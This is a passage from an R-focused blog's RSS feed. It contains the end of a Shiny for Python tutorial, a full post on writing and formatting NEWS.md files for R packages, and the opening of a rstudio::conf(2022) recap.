&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_plot(sub) &lt;span style="color:#8b949e;font-style:italic"&gt;# create our plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#8b949e;font-style:italic"&gt;# and return it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_server(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally running the app to see the fruits of our labour&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny run --port &lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt; diamonds.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Screen shot of simple shiny application" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/diamonds_screenshot.png" width="1739"&gt;&lt;/p&gt;
&lt;p&gt;We can update the chart by selecting the colours of diamonds that we want to display in the dropdown.&lt;/p&gt;
&lt;p&gt;An example of this app that you can browse and edit is hosted &lt;a href="https://jumpingrivers.github.io/blog-hello-shiny-python/edit/" rel="external"&gt;here&lt;/a&gt; using the new shiny live. The source is also available in our &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;blogs repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Have we got NEWS.md for you</title><link>https://www.jumpingrivers.com/blog/intro-to-r-news-format/</link><pubDate>Thu, 18 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-r-news-format/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-r-news-format/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/rnews2.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When developing a package it is essential to track the changes you make to your code. This is especially vital if they are breaking changes which have implications for any code written that depends on your package, i.e. a major version bump. Although you can always look back at your version control history in git, it is also convenient to have documentation which summarises the changes.&lt;/p&gt;
&lt;p&gt;This is where the NEWS file comes in. Usually a &lt;code&gt;.md&lt;/code&gt; file, the NEWS contains a description of the changes made between each version of a package up until the latest version. It is used to log things such as new features that have been added or bugs that have been fixed.&lt;/p&gt;
&lt;p&gt;In this blog post we will look at how to write a NEWS file and what guidelines and good practices there are to follow.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-news-format"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="who-uses-the-news"&gt;Who uses the NEWS&lt;/h3&gt;
&lt;p&gt;A NEWS file is useful for developers to keep track of changes. However, it is primarily looked at by users of the package to check any changes in a new version that could affect or be of interest to them. Therefore, the changes logged in a NEWS file are specifically user-facing, rather than a complete list of all changes.&lt;/p&gt;
&lt;h3 id="news-file-guidelines"&gt;NEWS file guidelines&lt;/h3&gt;
&lt;p&gt;There is not really a strict set of rules when it comes to NEWS files in R. Nevertheless, there are some rough guidelines to keep in mind. See, for example, Sec 1.1 of the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/R-exts.html#Package-structure" rel="external"&gt;R package manual&lt;/a&gt; and Ch 18 of &lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R packages (second edition)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Some R package universes also have their own NEWS file guidelines. For example, &lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;tidyverse&lt;/a&gt;, &lt;a href="https://devguide.ropensci.org/newstemplate.html#newstemplate" rel="external"&gt;rOpenSci&lt;/a&gt; and &lt;a href="https://www.bioconductor.org/developers/package-guidelines/#news" rel="external"&gt;Bioconductor&lt;/a&gt;. These guidelines have a lot of overlap and mostly follow what we will detail in the following sections.&lt;/p&gt;
&lt;h4 id="location-and-file-type"&gt;Location and file type&lt;/h4&gt;
&lt;p&gt;Let&amp;rsquo;s first consider where the NEWS should sit within your package.&lt;/p&gt;
&lt;p&gt;The NEWS file is usually found at the top level of the package folder, and can take one of the following formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Plain text (&lt;code&gt;NEWS&lt;/code&gt;)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Markdown (&lt;code&gt;NEWS.md&lt;/code&gt;)&lt;/strong&gt; - this is the most common format&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;R document (&lt;code&gt;inst/NEWS.Rd&lt;/code&gt;)&lt;/strong&gt; - note that this sits in the &lt;code&gt;inst&lt;/code&gt; subdirectory of your package, so gets copied into the top level when the package is installed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you include a NEWS file is actually entirely optional. From our own analyses of the CRAN packages for &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt;, we have found that less than half contain NEWS!&lt;/p&gt;
&lt;h4 id="content"&gt;Content&lt;/h4&gt;
&lt;p&gt;The R package manual recommends the &lt;a href="https://www.gnu.org/prep/standards/standards.html#Documentation" rel="external"&gt;GNU standard&lt;/a&gt;. Referring to Sec 6.7, these guidelines state the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The NEWS should contain &amp;ldquo;user-visible&amp;rdquo; changes that are &amp;ldquo;worth mentioning&amp;rdquo;.&lt;/li&gt;
&lt;li&gt;Changes for the latest release should be displayed at the top of the file, alongside a heading which indicates the version number.&lt;/li&gt;
&lt;li&gt;Older items should be displayed further down the file and should never be discarded, since they will be of interest to a user upgrading from a previous version.&lt;/li&gt;
&lt;li&gt;If the file gets very long, you can move some of the older changes to a separate &lt;code&gt;ONEWS&lt;/code&gt; file.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What exactly is meant by the first point here? In general, the NEWS is intended first and foremost for the package users. It should therefore focus on changes that are likely of interest to the users, including new features, bug fixes and breaking changes.&lt;/p&gt;
&lt;p&gt;Some R packages may also have a &lt;code&gt;ChangeLog&lt;/code&gt;, the purpose of which is to list &lt;strong&gt;all&lt;/strong&gt; changes (including to source code). This is more relevant to the package developers, and over time it&amp;rsquo;s purpose has become increasingly subsumed by version control softwares like GitHub.&lt;/p&gt;
&lt;h3 id="top-tips-for-writing-good-news"&gt;Top tips for writing &amp;ldquo;good&amp;rdquo; NEWS&lt;/h3&gt;
&lt;p&gt;Since the guidelines above are a bit vague and open-ended when it comes to format, we will share some top tips and examples to help ensure your NEWS is readable and easily accessible!&lt;/p&gt;
&lt;h4 id="markdown-is-best"&gt;Markdown is best&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R packages (second edition)&lt;/a&gt; recommends the markdown format (&lt;code&gt;NEWS.md&lt;/code&gt;) over the plain text and &lt;code&gt;.Rd&lt;/code&gt; formats. Some advantages of &lt;code&gt;NEWS.md&lt;/code&gt; include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown is readable as both plain text (e.g., when copied into an email) and HTML (e.g., when viewed on GitHub/GitLab).&lt;/li&gt;
&lt;li&gt;If you&amp;rsquo;re building a {&lt;a href="https://pkgdown.r-lib.org/" rel="external"&gt;&lt;code&gt;pkgdown&lt;/code&gt;&lt;/a&gt;} website for your package, the &lt;code&gt;NEWS.md&lt;/code&gt; will get nicely rendered (including any links to GitHub users and issues).&lt;/li&gt;
&lt;li&gt;Access to a &lt;code&gt;usethis::use_news_md()&lt;/code&gt; shortcut for incrementing the version and adding a new heading to your &lt;code&gt;NEWS.md&lt;/code&gt; file (for more info on version bumping, see &lt;a href="https://semver.org/" rel="external"&gt;semver.org&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In terms of how &lt;code&gt;NEWS.md&lt;/code&gt; should be presented, we recommend something close to the template below, which includes both a major release (containing a lot of changes which have been divided into subsections) and a minor release:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName 3.0.0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;This is a major release adding a range of substantial new features and fixing a
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;large number of bugs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Breaking changes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`enhancedFunction()`&lt;/span&gt; now accepts an extra argument &lt;span style="color:#a5d6ff"&gt;`newArg`&lt;/span&gt;, which controls
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; the behaviour of ... (&lt;span style="color:#ffa657"&gt;#18&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;#20&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`legendFunction()`&lt;/span&gt; by default now generates a legend with no border, rather
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; than a black border
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## New features
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`newFunction()`&lt;/span&gt; added which does ... (&lt;span style="color:#ffa657"&gt;#16&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`enhancedFunction()`&lt;/span&gt; now accepts an argument &lt;span style="color:#a5d6ff"&gt;`newArg`&lt;/span&gt;, which controls the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; behaviour of ... (&lt;span style="color:#ffa657"&gt;#18&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;#20&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Bug fixes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Axes generated using &lt;span style="color:#a5d6ff"&gt;`plottingFunction()`&lt;/span&gt; no longer overlap (&lt;span style="color:#ffa657"&gt;#25&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName 2.3.0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Feature: added a new function which does... (&lt;span style="color:#ffa657"&gt;#33&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Fix: resolved a minor bug which prevented... (&lt;span style="color:#ffa657"&gt;#46&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When viewed in GitLab, this will be nicely rendered:&lt;/p&gt;
&lt;p&gt;&lt;img alt="gitlab render" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/gitlab_news.png" width="1280"&gt;&lt;/p&gt;
&lt;p&gt;Note that the heading for each release is made up of the package name followed by the version number, and the changes are listed using bullet points. This also follows the format given in the &lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;tidyverse style guide&lt;/a&gt; which recommends that &amp;ldquo;each user-facing change to a package should be accompanied by a bullet&amp;rdquo; and that &amp;ldquo;each release should have a level 1 (#) heading&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;For enhanced readability, a major release with a lot of changes may be divided into subsections, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Breaking changes&lt;/strong&gt; - any changes that may cause a user&amp;rsquo;s code to break or produce an unexpected output&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;New features&lt;/strong&gt; - could include new functions and options&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bug fixes&lt;/strong&gt; - self-explanatory&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that items listed under &lt;strong&gt;Breaking changes&lt;/strong&gt; should also be included again under the relevant section.&lt;/p&gt;
&lt;p&gt;Rather than dividing into subsections, you could also label individual bullet points, as we have done for the minor release above.&lt;/p&gt;
&lt;p&gt;For some of the changes above, we have credited individual developers and referenced the corresponding GitLab issues. These links have been automatically rendered in GitLab.&lt;/p&gt;
&lt;h4 id="news-at-jumping-rivers"&gt;NEWS at Jumping Rivers&lt;/h4&gt;
&lt;p&gt;At Jumping Rivers we use a NEWS file format similar to the minor release in the example above:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each item is recorded in a single line.&lt;/li&gt;
&lt;li&gt;Items are listed altogether, rather than in separate sections.&lt;/li&gt;
&lt;li&gt;Items are recorded following the &lt;a href="https://www.conventionalcommits.org/en/v1.0.0/" rel="external"&gt;Conventional Commits&lt;/a&gt; specification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The choice of this format is due to the fact we roughly follow the GitLab flow model and have a short merge request cycle. Thus, few user-facing changes are added to the main branch in any one merge request (&lt;em&gt;in theory&lt;/em&gt;).&lt;/p&gt;
&lt;h4 id="compatibility-with-utilsnews"&gt;Compatibility with utils::news()&lt;/h4&gt;
&lt;p&gt;The quickest way for a user to access package news is with the &lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;news()&lt;/code&gt; function&lt;/a&gt; (from the base-R utils package), which can handle the &lt;code&gt;NEWS&lt;/code&gt;, &lt;code&gt;NEWS.md&lt;/code&gt; and &lt;code&gt;NEWS.Rd&lt;/code&gt; formats:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;news&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;packageName&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you&amp;rsquo;re working in RStudio, this will display the NEWS under the Help tab, identifying the version number along with each set of changes. The screenshot below shows an excerpt for {dplyr}:&lt;/p&gt;
&lt;p&gt;&lt;img alt="news function output" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/news_function.png" width="1308"&gt;&lt;/p&gt;
&lt;p&gt;If you don&amp;rsquo;t have the package installed, you can also point the function to the package folder location using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;news&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;packageName&amp;#34;&lt;/span&gt;, lib.loc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package_dir/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where &lt;code&gt;package_dir/&lt;/code&gt; would be the directory containing the package folder.&lt;/p&gt;
&lt;p&gt;When writing a NEWS file for your package, it is always a good idea to check that the &lt;code&gt;news()&lt;/code&gt; function can correctly display it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This is a quick and easy way to test your formatting.&lt;/li&gt;
&lt;li&gt;It ensures your package NEWS can be easily accessed by your users.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As an example, here is an excerpt from the &lt;code&gt;NEWS.md&lt;/code&gt; file for the {benchmarkme} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# benchmarkme Version 1.0.8 _2022-06-02_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; fix: &lt;span style="color:#a5d6ff"&gt;`get_ram()`&lt;/span&gt; for windows (thanks to &lt;span style="color:#ffa657"&gt;@ArkaB&lt;/span&gt;-DS &lt;span style="color:#ffa657"&gt;@xiaodaigh&lt;/span&gt; &lt;span style="color:#ffa657"&gt;#45&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; internal: linting &amp;amp; format NEWS.md file
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# benchmarkme Version 1.0.7 _2022-01-17_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Internal: Suppress warnings on &lt;span style="color:#a5d6ff"&gt;`sysctl`&lt;/span&gt; calls
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Fix: &lt;span style="color:#a5d6ff"&gt;`get_ram()`&lt;/span&gt; for windows (thanks to &lt;span style="color:#ffa657"&gt;@ArkaB&lt;/span&gt;-DS &lt;span style="color:#ffa657"&gt;#41&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Deprecate Solaris support
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is perfectly readable and consistent with the guidelines mentioned above.&lt;/p&gt;
&lt;p&gt;Now, here is the output from the &lt;code&gt;news()&lt;/code&gt; function:&lt;/p&gt;
&lt;p&gt;&lt;img alt="benchmarkme news output" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/benchmarkme_news.png" width="1046"&gt;&lt;/p&gt;
&lt;p&gt;The date is getting picked up by &lt;code&gt;news()&lt;/code&gt; as the version number, making it unclear which version each set of changes corresponds to. The bullet points also look off.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;news()&lt;/code&gt; documentation&lt;/a&gt; provides precise formatting guidelines for all three file types. For the &lt;code&gt;.md&lt;/code&gt; format, the guidelines are consistent with our template provided earlier. However, if you also want to show the release date, this should be enclosed in parentheses. A good heading would then be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName X.Y.Z (YYYY-MM-DD)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="beyond-news"&gt;Beyond NEWS&lt;/h3&gt;
&lt;p&gt;Whilst the NEWS file is a great place to record user-facing changes to your package, you can&amp;rsquo;t be sure that people will actually read it. They could be missing out on some great new features that you have worked hard to introduce! Accompanying a version release with a blog post which highlights major new features and bug fixes can be an effective way to inform your users. This is also recommended by the tidyverse style guide.&lt;/p&gt;
&lt;p&gt;From the user side you might find that looking through a NEWS file is fine for comparing a small number of changes or checking for new features. However, it can sometimes be hard to directly compare long lists of changes. &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt; is a tool that allows you to easily check what has changed between two versions of a package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It directly shows you any dependencies that have changed, as well as any functions that have been added, removed or changed.&lt;/li&gt;
&lt;li&gt;It also displays the NEWS file for each release between the two versions, so allows you to check the NEWS of any package in one place.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Disclaimer&lt;/em&gt;: We are developers on Diffify so may be slightly biased in recommending it, but we think it&amp;rsquo;s really useful and complementary to the NEWS!&lt;/p&gt;
&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;The following links may be of interest for further reference on the structure and format of NEWS files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cran.r-project.org/doc/manuals/r-release/R-exts.html#Package-structure" rel="external"&gt;R package manual&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R Packages (second edition)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;The tidyverse style guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.bioconductor.org/developers/package-guidelines/#news" rel="external"&gt;Bioconductor guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://devguide.ropensci.org/newstemplate.html#newstemplate" rel="external"&gt;rOpenSci NEWS template&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;utils::news()&lt;/code&gt; documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Another great blog post: &lt;a href="https://blog.r-hub.io/2020/05/08/pkg-news/" rel="external"&gt;Why and how maintain a NEWS file for your R package?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;For more on the semantic versioning framework: &lt;a href="https://semver.org/" rel="external"&gt;semver.org&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-r-news-format/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from rstudio::conf(2022)</title><link>https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/</link><pubDate>Thu, 11 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;July 25 - 28 2022 saw thousands of people attend &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf(2022)&lt;/a&gt; both in-person in Washington D.C. and virtually from all over the world, including a few of us from Jumping Rivers. Here&amp;rsquo;s a recap of the big news, and a few of our personal highlights from the conference!&lt;/p&gt;
&lt;h2 id="the-secrets-are-out"&gt;The secrets are out!&lt;/h2&gt;
&lt;p&gt;There were a couple of big announcements during the conference that it would be remiss not to mention.&lt;/p&gt;
&lt;h3 id="rstudio---posit"&gt;RStudio -&amp;gt; Posit&lt;/h3&gt;
&lt;p&gt;The biggest announcement of the conference was that as of October 2022, RStudio will have a new name: &lt;a href="https://posit.co" rel="external"&gt;Posit&lt;/a&gt;. RStudio are committed to developing open source software for &lt;a href="https://www.rstudio.com/blog/rstudio-is-becoming-posit/" rel="external"&gt;data science, scientific research, and technical communication&lt;/a&gt;, and for the past few years have been extending support for additional programming languages beyond R. RStudio Connect, RStudio Workbench, and RStudio Package Manager will become Posit Connect, Posit Workbench, and Posit Package Manager - making it clearer that these products support multiple languages. But don&amp;rsquo;t fear - RStudio are not abandoning R, as most of their open source software will continue to be predominantly developed for R. And the RStudio name will live on - returning to the days when RStudio referred to the IDE.&lt;/p&gt;
&lt;h3 id="shiny-for-python"&gt;Shiny for Python&lt;/h3&gt;
